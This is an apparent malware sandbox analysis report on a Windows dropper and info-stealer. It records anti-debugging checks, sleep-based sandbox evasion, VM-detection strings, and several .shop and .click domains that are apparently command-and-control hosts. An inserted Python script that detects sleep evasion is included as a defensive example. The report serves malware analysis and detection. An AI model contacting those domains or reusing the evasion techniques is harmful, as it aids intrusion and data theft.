    Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: section name: .muwav
    Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: section name: .roxah
    Source: EB86.tmp.exe.0.dr | Static PE information: section name: .nosu
    Source: EB86.tmp.exe.0.dr | Static PE information: section name: .muwav
    Source: EB86.tmp.exe.0.dr | Static PE information: section name: .roxah
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: 0_2_00410756 push ecx; ret 0_2_00410769
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: 0_2_0040FD82 push ecx; ret 0_2_0040FD95
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: 0_2_0062F1D0 pushad ; ret 0_2_0062F1EC
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: 0_2_0062F34D push ecx; ret 0_2_0062F36A
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: 0_2_0062CBC1 push 00000003h; ret 0_2_0062CBC5
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: 0_2_0062AE04 push es; iretd 0_2_0062AE15
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: 0_2_0062BED4 push ds; ret 0_2_0062BEDD
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: 0_2_0213798F push esp; retf 0_2_02137997
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: 0_2_021109BD push ecx; ret 0_2_021109D0
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: 0_2_0211CE08 push es; retf 0_2_0211CE0D
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: 0_2_02137F8D push esp; retf 0_2_02137F8E
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: 0_2_0210FFE9 push ecx; ret 0_2_0210FFFC
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: 0_2_02139DD8 pushad ; retf 0_2_02139DDF
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: 0_2_0213DDCE push dword ptr [esp+ecx-75h]; iretd 0_2_0213DDD2
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 2_2_00441850 push eax; mov dword ptr [esp], 0E0908DBh 2_2_00441853
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 2_2_0060817D pushfd ; ret 2_2_0060817E
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 2_2_0060613E push ebx; ret 2_2_0060613F
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 2_2_00608112 pushad ; ret 2_2_00608113
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 2_2_00606CE6 push esi; retn 001Ch 2_2_00606CEA
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 2_2_0218B05A push ebp; iretd 2_2_0218B05D
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 2_2_021A1AB7 push eax; mov dword ptr [esp], 0E0908DBh 2_2_021A1ABA
    Source: L7GNkeVm5e.exe | Static PE information: section name: .text entropy: 7.541693666484268
    Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: section name: .text entropy: 7.417548317236182
    Source: EB86.tmp.exe.0.dr | Static PE information: section name: .text entropy: 7.417548317236182
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | File created: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0040E96A GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E96A
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Window / User API: threadDelayed 3919
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Window / User API: threadDelayed 6069
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Evasive API call chain: GetSystemTimeAsFileTime, DecisionNodes graph_0-65060
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe API coverage: 5.1 %
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe API coverage: 10.0 %
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe TID: 5536 Thread sleep count: 3919 > 30
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe TID: 5536 Thread sleep time: -2829518s >= -30000s
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe TID: 5536 Thread sleep count: 6069 > 30
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe TID: 5536 Thread sleep time: -4381818s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe TID: 5968 Thread sleep time: -30000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe TID: 6196 Thread sleep time: -30000s >= -30000s
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Last function: Thread delayed
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Last function: Thread delayed
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_004389E2 FindFirstFileExW, 0_2_004389E2
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_02138C49 FindFirstFileExW, 0_2_02138C49
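    The thread-sleep entries above are the sandbox's delay heuristic: thread 5536 of L7GNkeVm5e.exe issued 3919 and then 6069 sleep calls, and the summed sleep interval crossed the 30000 mark (written as -30000s because NtDelayExecution takes negative values for relative intervals). The Python below is an added example, not Joe Sandbox code, that applies those same two thresholds (more than 30 sleeps per thread, or a summed delay of at least 30 s) to an API trace. The trace line format, the PIDs/TIDs and the interval values are constructed assumptions for the demonstration.

```python
"""Sleep-based sandbox-evasion heuristic (added example, not Joe Sandbox code).

A thread that sleeps more than 30 times, or whose requested delays add up to
30 s or more, is reported, mirroring the two comparisons in the report text.
The trace format parsed here is an assumption, not a real sandbox log format.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Thresholds taken from the report ("count ... > 30", "time ... >= -30000s").
MAX_SLEEP_COUNT = 30
MAX_SLEEP_MS = 30_000

# Constructed line format (assumption): "<pid> <tid> NtDelayExecution interval=<int>"
LINE_RE = re.compile(r"^(\d+)\s+(\d+)\s+NtDelayExecution\s+interval=(-?\d+)$")


@dataclass
class ThreadSleep:
    count: int = 0
    total_ms: float = 0.0


def interval_to_ms(interval: int) -> float:
    """Convert an NtDelayExecution interval to milliseconds.

    Negative values are relative delays in 100 ns ticks (the common case).
    Positive values are absolute times and are counted as 0 ms here, since
    their length depends on the clock at call time.
    """
    if interval >= 0:
        return 0.0
    return -interval / 10_000.0  # 10,000 ticks of 100 ns per millisecond


def aggregate(trace: str) -> dict:
    """Sum sleep count and delay per (pid, tid); unrelated API lines are skipped."""
    stats = defaultdict(ThreadSleep)
    for line in trace.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        pid, tid, interval = (int(x) for x in m.groups())
        s = stats[(pid, tid)]
        s.count += 1
        s.total_ms += interval_to_ms(interval)
    return dict(stats)


def flag_evasive_threads(trace: str) -> list:
    """Return one finding per thread that trips either threshold."""
    findings = []
    for (pid, tid), s in sorted(aggregate(trace).items()):
        reasons = []
        if s.count > MAX_SLEEP_COUNT:
            reasons.append(f"sleep count {s.count} > {MAX_SLEEP_COUNT}")
        if s.total_ms >= MAX_SLEEP_MS:
            reasons.append(f"sleep time {s.total_ms:.0f} ms >= {MAX_SLEEP_MS} ms")
        if reasons:
            findings.append({"pid": pid, "tid": tid, "count": s.count,
                             "total_ms": s.total_ms, "reasons": reasons})
    return findings


def build_sample_trace() -> str:
    """Constructed sample trace: one count-based evader, one time-based evader,
    one benign thread, plus a non-sleep line the parser must ignore."""
    lines = []
    # thread 5536: 40 sleeps of 50 ms -> count 40 > 30, total only 2000 ms
    lines += ["100 5536 NtDelayExecution interval=-500000"] * 40
    # thread 5968: a single 30 s sleep -> total 30000 ms >= 30000 ms
    lines += ["100 5968 NtDelayExecution interval=-300000000"]
    # thread 6200: two 1 s sleeps, below both thresholds
    lines += ["100 6200 NtDelayExecution interval=-10000000"] * 2
    # unrelated API call, skipped by the regex
    lines += ["100 6200 GetSystemTimeAsFileTime"]
    return "\n".join(lines)


if __name__ == "__main__":
    for finding in flag_evasive_threads(build_sample_trace()):
        print(finding)
```

    Both thresholds are needed: a loop of very short sleeps (the 3919-call pattern in this report) stays under the time threshold but not the count threshold, while a single long NtDelayExecution does the reverse.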
    Source: EB86.tmp.exe, 00000002.00000003.2167928507.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW~~
    Source: Amcache.hve.5.dr Binary or memory string: VMware
    Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin
    Source: Amcache.hve.5.dr Binary or memory string: VMware, Inc.
    Source: Amcache.hve.5.dr Binary or memory string: VMware20,1hbin@
    Source: Amcache.hve.5.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.5.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.5.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: L7GNkeVm5e.exe, 00000000.00000003.4407193910.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000002.4539795485.0000000000666000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000002.4539850806.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167928507.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2358880463.000000000064B000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168246436.0000000000648000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168282667.000000000064A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
    Source: Amcache.hve.5.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.5.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.5.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.5.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.5.dr Binary or memory string: vmci.sys
    Source: Amcache.hve.5.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin`
    Source: Amcache.hve.5.dr Binary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.5.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.5.dr Binary or memory string: VMware20,1
    Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.5.dr Binary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.5.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.5.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.5.dr Binary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.5.dr Binary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual RAM
    Source: Amcache.hve.5.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.5.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe Code function: 2_2_004402C0 LdrInitializeThunk, 2_2_004402C0
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_0042A3C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0042A3C3
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_0041EC4E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0041EC4E
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_0042FE4F mov eax, dword ptr fs:[00000030h] 0_2_0042FE4F
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_00629893 push dword ptr fs:[00000030h] 0_2_00629893
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_021300B6 mov eax, dword ptr fs:[00000030h] 0_2_021300B6
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_0210092B mov eax, dword ptr fs:[00000030h] 0_2_0210092B
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_02100D90 mov eax, dword ptr fs:[00000030h] 0_2_02100D90
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe Code function: 2_2_0060306B push dword ptr fs:[00000030h] 2_2_0060306B
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe Code function: 2_2_0216092B mov eax, dword ptr fs:[00000030h] 2_2_0216092B
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe Code function: 2_2_02160D90 mov eax, dword ptr fs:[00000030h] 2_2_02160D90
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_0043BBB1 GetProcessHeap, 0_2_0043BBB1
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_0042A3C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0042A3C3
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_004104C3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004104C3
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_00410656 SetUnhandledExceptionFilter, 0_2_00410656
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_0040F907 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0040F907
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_0212A62A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0212A62A
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_0211072A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0211072A
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_0210FB6E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0210FB6E
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_021108BD SetUnhandledExceptionFilter, 0_2_021108BD

    HIPS / PFW / Operating System Protection Evasion

    Source: EB86.tmp.exe String found in binary or memory: robinsharez.shop
    Source: EB86.tmp.exe String found in binary or memory: handscreamny.shop
    Source: EB86.tmp.exe String found in binary or memory: chipdonkeruz.shop
    Source: EB86.tmp.exe String found in binary or memory: versersleep.shop
    Source: EB86.tmp.exe String found in binary or memory: crowdwarek.shop
    Source: EB86.tmp.exe String found in binary or memory: apporholis.shop
    Source: EB86.tmp.exe String found in binary or memory: femalsabler.shop
    Source: EB86.tmp.exe String found in binary or memory: soundtappysk.shop
    Source: EB86.tmp.exe String found in binary or memory: skidjazzyric.click
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Process created: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe "C:\Users\user\AppData\Local\Temp\EB86.tmp.exe"
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_0041076B cpuid 0_2_0041076B
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: GetLocaleInfoW, 0_2_004351B0
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: EnumSystemLocalesW, 0_2_0043B272
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: EnumSystemLocalesW, 0_2_0043B2BD
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: EnumSystemLocalesW, 0_2_0043B358
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_0043B3E5
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: GetLocaleInfoW, 0_2_0043B635
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_0043B75E
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: GetLocaleInfoW, 0_2_0043B865
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_0043B932
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: EnumSystemLocalesW, 0_2_00434DBD
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_0043AFFA
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_0213B261
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: EnumSystemLocalesW, 0_2_02135024
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: GetLocaleInfoW, 0_2_02135417
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: EnumSystemLocalesW, 0_2_0213B4D9
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: EnumSystemLocalesW, 0_2_0213B524
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: EnumSystemLocalesW, 0_2_0213B5BF
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: GetLocaleInfoW, 0_2_0213BACC
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_0213BB99
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: GetLocaleInfoW, 0_2_0213B892
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: GetLocaleInfoW, 0_2_0213B89C
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_0213B9C5
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_004103BD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_004103BD
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_004163DA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8, 0_2_004163DA
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.5.dr Binary or memory string: msmpeng.exe
    Source: Amcache.hve.5.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.5.dr Binary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_004218BC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext, 0_2_004218BC
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_00420BE6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 0_2_00420BE6
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_02121B23 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext, 0_2_02121B23
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_02120E4D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 0_2_02120E4D
